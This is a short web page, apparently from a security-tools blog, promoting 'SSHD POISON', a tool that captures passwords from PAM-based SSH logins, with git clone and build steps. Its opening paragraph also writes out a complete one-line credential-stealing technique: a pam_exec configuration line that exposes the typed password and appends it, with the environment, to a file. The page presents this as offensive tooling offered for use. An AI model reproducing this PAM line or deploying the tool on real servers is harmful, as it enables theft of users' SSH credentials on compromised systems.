SSHD POISON is a tool to get creds of pam based sshd authentication, this is not the easiest way to do that (you can create a pam module, or just add auth optional pam_exec.so quiet expose_authtok /bin/bash -c {read,-r,x};{echo,-e,”`env`\n$x”}>>somefile in a service configuration), not even the stealthiest (the tool don’t have any mechanism to try hide yourself, and need to control the main sshd pid all the time), but code this gave me a lot of fun.

How to install

git clone --recurse-submodules https://github.com/hc0d3r/sshd-poison
cd sshd-poison
make

DOWNLOAD

Follow on Twitter, Instagram and Facebook

LEAVE A REPLY

Please enter your comment!
Please enter your name here